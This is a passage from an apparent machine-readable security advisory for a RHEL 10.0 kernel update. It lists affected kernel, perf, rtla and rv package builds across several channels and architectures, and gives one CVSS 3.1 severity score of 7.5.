"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
